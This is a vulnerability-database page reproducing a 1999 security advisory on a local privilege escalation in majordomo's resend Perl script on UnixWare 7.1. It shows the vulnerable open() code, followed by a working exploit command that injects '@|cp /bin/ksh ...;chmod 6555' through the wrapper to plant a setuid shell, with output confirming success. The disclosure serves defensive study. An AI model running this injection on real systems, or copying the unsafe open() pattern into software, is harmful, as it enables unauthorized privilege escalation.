Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

majordomo.local.txt

🗓️ 31 Dec 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

Local exploit in majordomo allows privilege escalation through vulnerable resend script.

Code
`---------- Forwarded message ----------  
Date: 28 Dec 99 20:47:44 CST  
From: Brock Tellier <[email protected]>  
Subject: majordomo local exploit  
  
OVERVIEW  
A vulnerability in majordomo allows local users to gain elevated  
privileges.  
  
BACKGROUND  
I've only tested the version of majordomo which comes with UnixWare   
7.1 which is 1.94.4. This vulnerability may or not still be present   
in newer versions of majordomo, but it exists on the default UW7.1  
installation.  
  
Thanks to rain.forest.puppy for his paper on how to exploit CGI/perl  
scripts, as it helped me out in this exploit. Grab it at  
http://www.wiretrip.net/rfp/p/doc.asp?id=6&iface=2  
  
DETAILS  
The majordomo wrapper allows users to run programs in the  
/usr/local/majordomo directory with the uid of owner and the gid of  
daemon. The permissions for wrapper are:  
  
-rwsr-xr-x 1 root daemon 6464 Jan 4 1999  
/usr/local/majordomo/wrapper  
  
but wrapper immediatly setuid()'s and setgid()'s to owner:daemon before  
execing the wrapped program.  
  
A vulnerability in "/usr/local/majordomo/resend" will allow us to execute  
arbitrary commands with our elevated privileges. The following code  
snippet appears in resend, a perl script:  
  
-snip-  
  
# If the first argument is "@filename", read the real arguments  
# from "filename", and shove them onto the ARGV for later processing  
# by &Getopts()  
#  
if ($ARGV[0] =~ /^\@/) {  
$fn = shift(@ARGV);  
$fn =~ s/^@//;  
open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");  
  
-snip-  
  
As you can see, if our first argument to resend starts with a "@",   
resend will attempt to open() the filename. However, open() can   
also be used to run programs if the first argument to open() begins   
with a pipe "|". If our first argument is "@|id", resend will run   
the program "id" with full privileges.  
  
EXPLOIT  
  
Our exploit is simple:  
  
bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh  
/tmp/xnec;chmod 6555 /tmp/xnec'  
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.  
  
bash-2.02$ ls -la /tmp/xnec  
-r-sr-sr-x 1 owner daemon 361688 Dec 29 06:26 /tmp/xnec  
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
____________________________________________________________________  
Get free email and a permanent address at http://www.netaddress.com/?N=1  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerability exploit majordomo privilege escalation resend script
42